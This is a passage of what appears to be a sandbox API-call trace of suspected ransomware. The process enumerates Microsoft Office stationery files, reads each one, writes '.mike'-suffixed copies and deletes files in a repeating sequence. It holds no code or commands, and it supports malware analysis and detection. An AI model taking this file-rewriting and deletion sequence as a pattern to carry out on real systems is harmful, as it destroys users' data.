lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0053.841] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.841] GetFileType (hFile=0x288) returned 0x1 [0053.841] GetFileType (hFile=0x288) returned 0x1 [0053.842] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg", dwFileAttributes=0x80) returned 0 [0053.843] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg.mike")) returned 1 [0053.845] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\small_news.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0053.846] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\small_news.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.846] GetFileType (hFile=0x288) returned 0x1 [0053.846] GetFileType (hFile=0x288) returned 0x1 [0053.847] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.847] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\small_news.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.847] GetFileType (hFile=0x288) returned 0x1 [0053.847] GetFileType (hFile=0x288) returned 0x1 [0053.847] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0053.848] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\small_news.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.848] GetFileType (hFile=0x288) returned 0x1 [0053.848] GetFileType (hFile=0x288) returned 0x1 [0053.848] ReadFile (in: hFile=0x288, lpBuffer=0x2288b74, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2288b74*, lpNumberOfBytesRead=0x2af0c8*=0x7c6, lpOverlapped=0x0) returned 1 [0053.850] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\small_news.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.850] GetFileType (hFile=0x288) returned 0x1 [0053.850] GetFileType (hFile=0x288) returned 0x1 [0053.850] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0053.850] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\small_news.jpg.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.851] GetFileType (hFile=0x288) returned 0x1 [0053.851] GetFileType (hFile=0x288) returned 0x1 [0053.852] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg", dwFileAttributes=0x80) returned 0 [0053.852] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\small_news.jpg.mike")) returned 1 [0053.854] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0053.855] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.855] GetFileType (hFile=0x288) returned 0x1 [0053.856] GetFileType (hFile=0x288) returned 0x1 [0053.856] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.856] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.856] GetFileType (hFile=0x288) returned 0x1 [0053.856] GetFileType (hFile=0x288) returned 0x1 [0053.856] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0053.857] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.857] GetFileType (hFile=0x288) returned 0x1 [0053.857] GetFileType (hFile=0x288) returned 0x1 [0053.857] ReadFile (in: hFile=0x288, lpBuffer=0x22981ac, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22981ac*, lpNumberOfBytesRead=0x2af0c8*=0xe8, lpOverlapped=0x0) returned 1 [0053.858] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.858] GetFileType (hFile=0x288) returned 0x1 [0053.859] GetFileType (hFile=0x288) returned 0x1 [0053.859] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0053.859] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.859] GetFileType (hFile=0x288) returned 0x1 [0053.859] GetFileType (hFile=0x288) returned 0x1 [0053.860] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm", dwFileAttributes=0x80) returned 0 [0053.861] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm.mike")) returned 1 [0053.862] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0053.864] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.864] GetFileType (hFile=0x288) returned 0x1 [0053.864] GetFileType (hFile=0x288) returned 0x1 [0053.864] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.864] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.865] GetFileType (hFile=0x288) returned 0x1 [0053.865] GetFileType (hFile=0x288) returned 0x1 [0053.865] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0053.866] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.866] GetFileType (hFile=0x288) returned 0x1 [0053.866] GetFileType (hFile=0x288) returned 0x1 [0053.866] ReadFile (in: hFile=0x288, lpBuffer=0x22a4e04, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22a4e04*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0053.869] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.869] GetFileType (hFile=0x288) returned 0x1 [0053.869] GetFileType (hFile=0x288) returned 0x1 [0053.869] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0053.870] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.870] GetFileType (hFile=0x288) returned 0x1 [0053.871] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg", dwFileAttributes=0x80) returned 0 [0053.872] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg.mike")) returned 1 [0053.874] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.877] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm", dwFileAttributes=0x80) returned 0 [0053.878] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.htm.mike")) returned 1 [0053.881] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.885] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg", dwFileAttributes=0x80) returned 0 [0053.886] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg.mike")) returned 1 [0053.892] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.896] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg", dwFileAttributes=0x80) returned 0 [0053.897] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tanspecks.jpg.mike")) returned 1 [0053.899] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.903] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg", dwFileAttributes=0x80) returned 0 [0053.904] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\white_chocolate.jpg.mike")) returned 1 [0053.905] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe96a2680, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe96c87e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.905] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2608de, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2608de, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xcdfff30e, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xff, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bears.htm", cAlternateFileName="")) returned 1 [0053.905] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2acb98, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2acb98, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa352261, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x432, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bears.jpg", cAlternateFileName="")) returned 1 [0053.905] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4ca9e3b, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4ca9e3b, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4421c165, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xa0f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Blue_Gradient.jpg", cAlternateFileName="")) returned 1 [0053.906] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4ccff98, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4ccff98, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x442422c3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x11eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cave_Drawings.gif", cAlternateFileName="")) returned 1 [0053.906] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4d6850c, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4d6850c, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4434cc55, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x90f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connectivity.gif", cAlternateFileName="")) returned 1 [0053.906] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x80425158, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bf1d2d9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bf1d2d9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x285, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0053.906] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5015d96, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5015d96, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x444c9a01, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xed0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dotted_Lines.emf", cAlternateFileName="")) returned 1 [0053.906] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2acb98, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2acb98, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce04b5c8, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Garden.htm", cAlternateFileName="")) returned 1 [0053.906] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2acb98, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2acb98, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa410937, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x5d3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Garden.jpg", cAlternateFileName="")) returned 1 [0053.906] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc50881ad, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc50881ad, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x444efb5f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1594, dwReserved0=0x0, dwReserved1=0x0, cFileName="Genko_1.emf", cAlternateFileName="")) returned 1 [0053.906] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc50d4467, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc50d4467, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44515cbd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2864, dwReserved0=0x0, dwReserved1=0x0, cFileName="Genko_2.emf", cAlternateFileName="")) returned 1 [0053.907] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5120721, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5120721, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4453be1b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1c7f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Graph.emf", cAlternateFileName="")) returned 1 [0053.907] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2d2cf5, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2d2cf5, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce071725, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Green Bubbles.htm", cAlternateFileName="")) returned 1 [0053.907] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2f8e52, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2f8e52, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa436a95, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1906, dwReserved0=0x0, dwReserved1=0x0, cFileName="GreenBubbles.jpg", cAlternateFileName="")) returned 1 [0053.907] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4fc9adc, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4fc9adc, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4453be1b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xb68, dwReserved0=0x0, dwReserved1=0x0, cFileName="grid_(cm).wmf", cAlternateFileName="")) returned 1 [0053.907] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4fa397f, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4fa397f, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44692a69, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1d4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="grid_(inch).wmf", cAlternateFileName="")) returned 1 [0053.907] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce31efaf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce31efaf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce0bd9df, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xeb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hand Prints.htm", cAlternateFileName="")) returned 1 [0053.907] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce31efaf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce31efaf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa45cbf3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x107e, dwReserved0=0x0, dwReserved1=0x0, cFileName="HandPrints.jpg", cAlternateFileName="")) returned 1 [0053.907] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5192b38, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5192b38, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4480f815, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x252ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="Memo.emf", cAlternateFileName="")) returned 1 [0053.908] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, 